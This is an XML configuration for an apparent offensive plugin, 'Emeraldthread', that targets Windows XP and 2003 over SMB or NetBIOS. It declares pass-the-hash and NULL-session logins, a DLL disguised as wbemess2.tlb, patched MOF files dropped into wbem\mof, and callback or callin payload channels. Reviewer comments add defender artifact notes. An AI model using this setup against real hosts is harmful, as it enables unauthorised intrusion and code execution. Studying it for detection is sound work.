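<?xml version="1.0" encoding="UTF-8"?>
<!--
  Plugin configuration "Emeraldthread" (tc0 config schema, version 3.0.0).

  What this file declares, as far as the file itself shows:
    * a target reached over SMB (tcp/445) or NetBIOS session (tcp/139);
    * authentication as anonymous (NULL session), guest, a user with no
      password, a username+password, or a username plus NTLM hash or
      NTLM+LANMAN hashes (the hash variants need no cleartext password);
    * a DLL and a "patched" MOF file, supplied either from local files or as
      inline buffers, written to fixed paths under \windows\system32\wbem\
      on the target;
    * a payload channel: the target calls back to the plugin, the plugin
      calls in to the target, or the payload is dropped with no feedback;
    * constraints limiting use to Windows XP SP1/SP2/SP3 and Windows 2003
      SP0/SP1/SP2 with an smb or nbt service present.

  Defender notes (artifact list taken from the defaults below, not from any
  observed behaviour): wbem\wbemess2.tlb (a DLL written under a .tlb name),
  wbem\mof\nnetcfg.mof and wbem\mof\evntprv.mof. How the dropped MOF files
  lead to execution is not visible in this file; presumably the WMI service
  auto-compiles files placed in wbem\mof on these OS versions, but confirm
  against the plugin code before relying on that for detection logic.

  Review fixes applied here: pretty-printed the single-line original,
  gave ListenLocalPort its own description (it duplicated ListenPort's),
  and filled the empty description on the DropAndExecute output group to
  mirror the input group of the same name. All names, types, defaults and
  paths are unchanged.
-->
<t:config id="37f19b4f9e69dca220147a0361b8aa2084054325"
          name="Emeraldthread"
          version="3.0.0"
          configversion="3.0.0.0"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xmlns:t="tc0">

  <t:inputparameters>
    <!-- S16 presumably means signed 16-bit, so the practical upper bound is 32767 s; confirm. -->
    <t:parameter name="NetworkTimeout"
                 description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
                 type="S16" default="60"/>
    <t:parameter name="TargetIp" description="Target IP Address" type="IPv4" binding="//identifier"/>

    <!-- Transport: plain SMB on 445 or NetBIOS session service on 139. -->
    <t:paramchoice name="Protocol" default="SMB" description="Protocol to connect to target with">
      <t:paramgroup name="SMB" description="SMB over TCP">
        <t:parameter name="TargetPort" description="Port used by SMB" type="TcpPort" default="445"/>
      </t:paramgroup>
      <t:paramgroup name="NBT" description="Netbios over TCP">
        <t:parameter name="TargetPort" description="Port used by Netbios" type="TcpPort" default="139"/>
      </t:paramgroup>
    </t:paramchoice>

    <!--
      Credential options. The "NTLM hash" and "Both hashes" groups take the
      hash in hex instead of a password, i.e. hash-based (pass-the-hash style)
      authentication; the NULL-session and guest groups need no credentials.
    -->
    <t:paramchoice name="Credentials" description="Type of credentials to use">
      <t:paramgroup name="Anonymous" description="Anonymous (NULL session)"/>
      <t:paramgroup name="Guest" description="Guest account"/>
      <t:paramgroup name="No password" description="User account with no password set">
        <t:parameter name="Username" description="" type="UString"/>
      </t:paramgroup>
      <t:paramgroup name="Password" description="Username and password">
        <t:parameter name="Username" description="" type="UString"/>
        <t:parameter name="Password" description="" type="UString"/>
      </t:paramgroup>
      <t:paramgroup name="NTLM hash" description="Username and NTLM hash">
        <t:parameter name="Username" description="" type="UString"/>
        <t:parameter name="NTLMHash" description="NTLM password hash (in hex)" type="UString"/>
      </t:paramgroup>
      <t:paramgroup name="Both hashes" description="Username, NTLM hash, and LANMAN hash">
        <t:parameter name="Username" description="" type="UString"/>
        <t:parameter name="NTLMHash" description="NTLM password hash (in hex)" type="UString"/>
        <t:parameter name="LANMANHash" description="LANMAN password hash (in hex)" type="UString"/>
      </t:paramgroup>
    </t:paramchoice>

    <!-- Payload channel. The ports named here are referenced by the redirection rules below. -->
    <t:paramchoice name="PayloadType" description="Callback from target or callin to target" default="Callback">
      <t:paramgroup name="Callback" description="Target calls back to plugin">
        <t:parameter name="CallbackIp" description="Callback IP address" type="IPv4"/>
        <!-- default 0: presumably "let the framework choose"; confirm against the tc0 schema. -->
        <t:parameter name="CallbackPort" description="Callback port" type="TcpPort" default="0"/>
        <t:parameter name="CallbackLocalPort" description="Local callback port" type="TcpPort" required="false"/>
      </t:paramgroup>
      <t:paramgroup name="Callin" description="Target waits for call from plugin">
        <t:parameter name="ListenPort" description="Listen port" type="TcpPort"/>
        <t:parameter name="ListenLocalPort" description="Local listen port" type="TcpPort" required="false"/>
        <t:parameter name="ListenWait" description="Timeout to wait before trying to connect in." type="S16" default="10"/>
      </t:paramgroup>
      <t:paramgroup name="DropAndExecute" description="Payload deployed with no feedback">
        <t:parameter name="PayloadContract" description="Passthrough contract" type="String" required="false"/>
      </t:paramgroup>
    </t:paramchoice>

    <!--
      Payload bytes: either two local files (defaults esud.dll / nnetcfg.mof)
      or two inline buffers. The DLL is described as "unconfigured" and the
      MOF as "patched"; the patching itself is not done in this file.
    -->
    <t:paramchoice name="PayloadSource" description="Payload source input type" default="File">
      <t:paramgroup name="File" description="Payloads provided by file">
        <t:parameter name="UnconfiguredDLL"
                     description="The unconfigured DLL file that will be written to target"
                     type="LocalFile" default="esud.dll"/>
        <t:parameter name="ConfiguredMOF"
                     description="The patched mof file that will be written to target"
                     type="LocalFile" default="nnetcfg.mof"/>
      </t:paramgroup>
      <t:paramgroup name="Inline" description="Payloads provided inline">
        <t:parameter name="DLLBuffer"
                     description="The unconfigured DLL file that will be written to target"
                     type="UString" required="false"/>
        <t:parameter name="MOFBuffer"
                     description="The patched mof file that will be written to target"
                     type="UString" required="false"/>
      </t:paramgroup>
    </t:paramchoice>

    <!--
      On-target paths (relative to the system drive). Note the DLL is written
      under a .tlb name, and the literal "\.\" segment in the MOF paths is
      kept exactly as in the original; presumably deliberate, so do not
      normalize it without checking the plugin's path handling.
    -->
    <t:parameter name="RemoteDLLPath"
                 description="The path where we want the DLL to exist on target"
                 type="String" default="\windows\system32\wbem\wbemess2.tlb"/>
    <t:parameter name="RemoteMOFPath"
                 description="The path where we want the patched mof file to exist on target"
                 type="String" default="\windows\system32\wbem\.\mof\nnetcfg.mof"/>
    <t:parameter name="RemoteMOFTriggerPath"
                 description="The path where we want the mof trigger file to exist on target"
                 type="String" default="\windows\system32\wbem\.\mof\evntprv.mof"/>
    <!-- Only a printer name is taken; how it is used is not visible in this config. -->
    <t:parameter name="PrinterName" description="The name of the printer on target" type="UString" format="Scalar"/>
  </t:inputparameters>

  <t:outputparameters>
    <t:paramchoice name="PayloadType" description="Payload type determines contract">
      <t:paramgroup name="StagedUpload" description="Callin or Callback">
        <t:parameter name="ConnectedTcp" description="Connected TCP Socket to target" type="Socket"/>
        <t:parameter name="Contract" description="Plugin contract" type="String" value="StagedUpload"/>
        <!-- Single byte (U8). What it masks is not stated here; presumably the staged upload stream, confirm. -->
        <t:parameter name="XorMask" description="" type="U8"/>
      </t:paramgroup>
      <t:paramgroup name="DropAndExecute" description="Payload deployed with no feedback">
        <!-- No fixed value, unlike StagedUpload; presumably carries the PayloadContract passthrough input, confirm. -->
        <t:parameter name="Contract" description="Plugin contract" type="String"/>
      </t:paramgroup>
    </t:paramchoice>
  </t:outputparameters>

  <!--
    Tunnels. The first rule does not close on completion, presumably so the
    TargetPort session survives into the payload stage; the second serves the
    Callin case and the remote rule the Callback case.
  -->
  <t:redirection>
    <t:local protocol="Tcp" listenaddr="TargetIp" listenport="TargetPort"
             destaddr="//identifier" destport="TargetPort" closeoncompletion="false"/>
    <t:local protocol="Tcp" listenaddr="TargetIp" listenport="ListenLocalPort"
             destaddr="//identifier" destport="ListenPort"/>
    <t:remote protocol="Tcp" listenaddr="CallbackIp" listenport="CallbackPort"
              destport="CallbackLocalPort"/>
  </t:redirection>

  <!--
    Applicability: (smb OR nbt service) AND (one of six Windows XP / 2003
    service-pack levels). NOTE(review): "Target" is bound below but is not
    declared in inputparameters; presumably supplied by the framework, confirm
    against the tc0 schema.
  -->
  <t:logic>
    <t:and>
      <t:or>
        <t:service name="smb">
          <t:bindtovalue name="Protocol" value="SMB"/>
          <t:bindtopath name="TargetPort" path="//service[name='smb']/port"/>
        </t:service>
        <t:service name="nbt">
          <t:bindtovalue name="Protocol" value="NBT"/>
          <t:bindtopath name="TargetPort" path="//service[name='nbt']/port"/>
        </t:service>
      </t:or>
      <t:or>
        <t:os family="windows" name="Windows XP" servicepack="1">
          <t:bindtovalue name="Target" value="XPSP1"/>
        </t:os>
        <t:os family="windows" name="Windows XP" servicepack="2">
          <t:bindtovalue name="Target" value="XPSP2"/>
        </t:os>
        <t:os family="windows" name="Windows XP" servicepack="3">
          <t:bindtovalue name="Target" value="XPSP3"/>
        </t:os>
        <t:os family="windows" name="Windows 2003" servicepack="0">
          <t:bindtovalue name="Target" value="W2K3SP0"/>
        </t:os>
        <t:os family="windows" name="Windows 2003" servicepack="1">
          <t:bindtovalue name="Target" value="W2K3SP1"/>
        </t:os>
        <t:os family="windows" name="Windows 2003" servicepack="2">
          <t:bindtovalue name="Target" value="W2K3SP2"/>
        </t:os>
      </t:or>
    </t:and>
  </t:logic>
</t:config>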